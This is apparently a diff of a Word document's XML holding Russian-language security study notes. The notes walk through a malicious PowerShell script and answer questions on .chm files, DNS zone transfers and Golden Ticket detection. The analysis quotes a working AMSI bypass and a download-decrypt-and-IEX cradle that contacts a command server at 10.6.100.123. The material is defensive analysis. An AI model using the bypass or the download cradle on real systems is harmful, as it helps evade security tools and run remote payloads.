-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>обойти</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>('</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>интерфейс</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>System.Management.Automation.AmsiUtils</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>сканирования</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">') | ?{$_} | %{ $_.GetField('amsiInitFailed','NonPublic,Static').SetValue($NULL,$True) }; </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>Эта</w:t>
+        <w:t>вредоносных</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3480,20 +3327,20 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>часть</w:t>
+        <w:t>программ</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> (AMSI), </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>пытается</w:t>
+        <w:t>устанавливая</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3506,20 +3353,20 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>обойти</w:t>
+        <w:t>поле</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>интерфейс</w:t>
+        <w:t>которое</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3532,7 +3379,7 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>сканирования</w:t>
+        <w:t>указывает</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3545,7 +3392,7 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>вредоносных</w:t>
+        <w:t>на</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3558,125 +3405,134 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>программ</w:t>
+        <w:t>сбой</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (AMSI), </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>устанавливая</w:t>
+        <w:t>инициализации</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> AMSI. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>поле</w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve">Это часто делается во вредоносных скриптах, чтобы избежать обнаружения программным обеспечением безопасности. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>которое</w:t>
+        <w:t xml:space="preserve">5. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Инициализация веб-клиента powershell</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>указывает</w:t>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WC=New-Object System.Net.WebClient; $u='Mozilla/5.0(Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'; $WC.Headers.Add('User-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>на</w:t>
-      </w:r>
-      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Agent',$u); Создается новый веб-клиент, и добавляется строка user-agent для имитации легитимного веб-браузера. Это обычно используется для избежания обнаружения при выполнении веб-запросов. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>сбой</w:t>
+        <w:t xml:space="preserve">6. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Загрузка данных powershell</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>инициализации</w:t>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> AMSI. </w:t>
-      </w:r>
-      <w:r>
+        </w:rPr>
+        <w:t xml:space="preserve"> $DAtA=$WC.DownloadData($SER+$T); Скрипт создает URL-адрес и загружает с него данные. Похоже, он подключается к локальному IP-адресу (10.6.100.123), что может указывать на сервер управления и контроля или другой вредоносный источник. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">Это часто делается во вредоносных скриптах, чтобы избежать обнаружения программным обеспечением безопасности. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">7. </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">5. </w:t>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Расшифровка и выполнение данных powershell</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3684,389 +3540,90 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">Инициализация веб-клиента </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>:</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        </w:rPr>
+        <w:t xml:space="preserve"> -join [Char[]](&amp;$R $datA($IV+$K)) | IEX Загруженные данные обрабатываются с помощью пользовательской функции расшифровки ($R) и выполняются с помощью IEX (Invoke-Expression). Это распространенный метод запуска динамически сгенерированных или загруженных скриптов. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $WC=New-Object </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Резюме</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>System.Net.WebClient</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t xml:space="preserve"> В целом, этот скрипт, по-видимому, предназначен для: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">; $u='Mozilla/5.0(Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>like</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">• Обхода мер безопасности (таких как ведение журнала блоков скриптов и AMSI). </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>Gecko</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">• Изменение системных настроек для снижения видимости и отслеживания. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>'; $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>WC.Headers.Add</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">• Загрузка и выполнение потенциально опасного кода с указанного сервера. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>('</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>User-Agent',$u</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">); Создается новый веб-клиент, и добавляется строка </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>user-agent</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> для имитации легитимного веб-браузера. Это обычно используется для избежания обнаружения при выполнении веб-запросов. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">6. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Загрузка данных </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>DAtA</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>=$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>WC.DownloadData</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">($SER+$T); Скрипт создает URL-адрес и загружает с него данные. Похоже, он подключается к локальному IP-адресу (10.6.100.123), что может указывать на сервер управления и контроля или другой вредоносный источник. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">7. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Расшифровка и выполнение данных </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>join</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> [</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>Char</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>[]](&amp;$R $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>datA</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">($IV+$K)) | IEX Загруженные данные обрабатываются с помощью пользовательской функции расшифровки ($R) и выполняются с </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>помощью IEX (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>Invoke-Expression</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">). Это распространенный метод запуска динамически сгенерированных или загруженных скриптов. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Резюме</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> В целом, этот скрипт, по-видимому, предназначен для: </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">• Обхода мер безопасности (таких как ведение журнала блоков скриптов и AMSI). </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">• Изменение системных настроек для снижения видимости и отслеживания. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">• Загрузка и выполнение потенциально опасного кода с указанного сервера. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Такое поведение типично для вредоносных программ или других вредоносных скриптов, нацеленных на использование </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> для несанкционированных действий.</w:t>
+        <w:t>Такое поведение типично для вредоносных программ или других вредоносных скриптов, нацеленных на использование PowerShell для несанкционированных действий.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4187,44 +3744,20 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Почему файлы с расширением «</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>» могут быть опасны?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Файлы с расширением «.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>» (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Compiled</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> HTML Help) могут представлять опасность по нескольким причинам:</w:t>
+        <w:t>Почему файлы с расширением «chm» могут быть опасны?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Файлы с расширением «.chm» (Compiled HTML Help) могут представлять опасность по нескольким причинам:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4360,59 +3893,7 @@
         <w:t>Сбор информации</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: Злоумышленники могут использовать AXFR-запросы для сбора информации о вашем домене, включая все </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>поддомены</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, IP-адреса и другие записи. Эта информация может быть использована для планирования атак.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Уязвимости</w:t>
-      </w:r>
-      <w:r>
-        <w:t>: Если ваш DNS-сервер неправильно настроен и разрешает AXFR-запросы от неавторизованных IP, это создает уязвимость. Злоумышленник может получить доступ к конфиденциальной информации.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Атаки на инфраструктуру</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: Получив полную зону, злоумышленник может анализировать вашу инфраструктуру, выявлять слабые места и разрабатывать стратегии для дальнейших атак, таких как </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>DDoS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> или фишинг.</w:t>
+        <w:t>: Злоумышленники могут использовать AXFR-запросы для сбора информации о вашем домене, включая все поддомены, IP-адреса и другие записи. Эта информация может быть использована для планирования атак.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4428,6 +3909,42 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:t>Уязвимости</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: Если ваш DNS-сервер неправильно настроен и разрешает AXFR-запросы от неавторизованных IP, это создает уязвимость. Злоумышленник может получить доступ к конфиденциальной информации.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Атаки на инфраструктуру</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: Получив полную зону, злоумышленник может анализировать вашу инфраструктуру, выявлять слабые места и разрабатывать стратегии для дальнейших атак, таких как DDoS или фишинг.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>Недостаточная защита</w:t>
       </w:r>
       <w:r>
@@ -4441,31 +3958,7 @@
         <w:t>DNS-сервер</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> не защищен должным образом, что может привести к другим атакам, таким как </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>spoofing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> или </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cache</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>poisoning</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve"> не защищен должным образом, что может привести к другим атакам, таким как spoofing или cache poisoning.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4514,36 +4007,20 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Как обнаружить атаку Golden </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ticket</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Атака Golden </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ticket</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> — это метод компрометации, используемый злоумышленниками для получения несанкционированного доступа к ресурсам в сети Windows. Вот несколько шагов, которые помогут обнаружить такую атаку:</w:t>
+        <w:t>Как обнаружить атаку Golden Ticket?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Атака Golden Ticket — это метод компрометации, используемый злоумышленниками для получения несанкционированного доступа к ресурсам в сети Windows. Вот несколько шагов, которые помогут обнаружить такую атаку:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4590,16 +4067,8 @@
